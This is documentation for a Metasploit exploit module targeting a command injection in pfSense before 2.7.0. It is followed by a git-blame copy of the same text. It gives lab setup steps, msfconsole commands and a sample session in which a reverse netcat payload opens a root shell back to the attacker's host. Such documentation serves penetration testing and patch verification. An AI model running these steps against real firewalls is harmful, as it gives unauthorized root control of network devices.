documentation/modules/exploit/unix/http/pfsense_config_data_exec.md

## Vulnerable Application

This module exploits an authenticated command injection vulnerability in the `restore_rrddata()` function of
pfSense prior to 2.7.0 which allows an authenticated attacker with the `WebCfg - Diagnostics: Backup & Restore` privilege
to execute arbitrary operating system commands as the `root` user.

This module has been tested successfully on version 2.6.0-RELEASE.

### Installing the Application
Download the ISO from [pfSense 2.6.0-RELEASE](https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz)
and then create a VMWare or VirtualBox VM using this ISO.

Note that you may wish to use the BIOS boot method when prompted for which method to use for installation, 
rather than ZFS or UEFI for testing purposes, just to simplify setup. Otherwise you can accept the default settings.

Once installation is finished you should be prompted to reboot. Reboot, then enter `n` when asked if you want to set up VLANs.

For the WAN prompt enter `em0` which should work, or whatever one other than `a` that appears in the prompt and hit ENTER.

Wait for setup to complete then try to browse to `http://<IP ADDRESS SHOWN HERE>/` replacing the
placeholder with the IP address shown in the prompt. You should see the login page for pfSense.

Log in with username `admin` and password `pfsense`. There should be a setup GUI that appears. Accept all the defaults
and keep clicking `Next` at each of the steps and then `Finish` at the final step. Finally click `Accept` on the export
warning page and `Close` on the following popup. You should now see the main dashboard and should be ready to test the
module.

## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/unix/http/pfsense_config_data_exec`
3. Do: `set RHOST [IP]`
4. Do: `set USERNAME [username]`
5. Do: `set PASSWORD [password]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

## Options

## Scenarios

### pfSense Community Edition 2.6.0-RELEASE

```
msf6 exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec 
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1
RHOST => 1.1.1.1
msf6 exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2
LHOST => 2.2.2.2
msf6 exploit(unix/http/pfsense_config_data_exec) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] pfSense version: 2.6.0-RELEASE
[+] The target is vulnerable.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300

id
uid=0(root) gid=0(wheel) groups=0(wheel)
whoami
root
```
pfSense Config Data Remote Command Execution as root (CVE-2023-27253) Module 2023-04-08 04:51:31 +03:00			`## Vulnerable Application`

spelling fixes on docs 2023-10-10 14:46:18 -04:00			This module exploits an authenticated command injection vulnerability in the `restore_rrddata()` function of
pfSense Config Data Remote Command Execution as root (CVE-2023-27253) Module 2023-04-08 04:51:31 +03:00			pfSense prior to 2.7.0 which allows an authenticated attacker with the `WebCfg - Diagnostics: Backup & Restore` privilege
			to execute arbitrary operating system commands as the `root` user.

			`This module has been tested successfully on version 2.6.0-RELEASE.`

			`### Installing the Application`
			`Download the ISO from [pfSense 2.6.0-RELEASE](https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz)`
			`and then create a VMWare or VirtualBox VM using this ISO.`

			`Note that you may wish to use the BIOS boot method when prompted for which method to use for installation,`
			`rather than ZFS or UEFI for testing purposes, just to simplify setup. Otherwise you can accept the default settings.`

			Once installation is finished you should be prompted to reboot. Reboot, then enter `n` when asked if you want to set up VLANs.

			For the WAN prompt enter `em0` which should work, or whatever one other than `a` that appears in the prompt and hit ENTER.

			Wait for setup to complete then try to browse to `http://<IP ADDRESS SHOWN HERE>/` replacing the
			`placeholder with the IP address shown in the prompt. You should see the login page for pfSense.`

			Log in with username `admin` and password `pfsense`. There should be a setup GUI that appears. Accept all the defaults
			and keep clicking `Next` at each of the steps and then `Finish` at the final step. Finally click `Accept` on the export
			warning page and `Close` on the following popup. You should now see the main dashboard and should be ready to test the
			`module.`

			`## Verification Steps`
			1. Start `msfconsole`
			2. Do: `use exploit/unix/http/pfsense_config_data_exec`
			3. Do: `set RHOST [IP]`
			4. Do: `set USERNAME [username]`
			5. Do: `set PASSWORD [password]`
			6. Do: `set LHOST [IP]`
			7. Do: `exploit`

			`## Options`

			`## Scenarios`

			`### pfSense Community Edition 2.6.0-RELEASE`

			```
			`msf6 exploit(unix/http/pfsense_config_data_exec) > use exploit/unix/http/pfsense_config_data_exec`
			`[*] Using configured payload cmd/unix/reverse_netcat`
			`msf6 exploit(unix/http/pfsense_config_data_exec) > set RHOST 1.1.1.1`
			`RHOST => 1.1.1.1`
			`msf6 exploit(unix/http/pfsense_config_data_exec) > set LHOST 2.2.2.2`
			`LHOST => 2.2.2.2`
			`msf6 exploit(unix/http/pfsense_config_data_exec) > exploit`

			`[*] Started reverse TCP handler on 2.2.2.2:4444`
			`[*] pfSense version: 2.6.0-RELEASE`
			`[+] The target is vulnerable.`
			`[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:21942) at 2023-03-26 02:10:48 +0300`

			`id`
			`uid=0(root) gid=0(wheel) groups=0(wheel)`
			`whoami`
			`root`
			```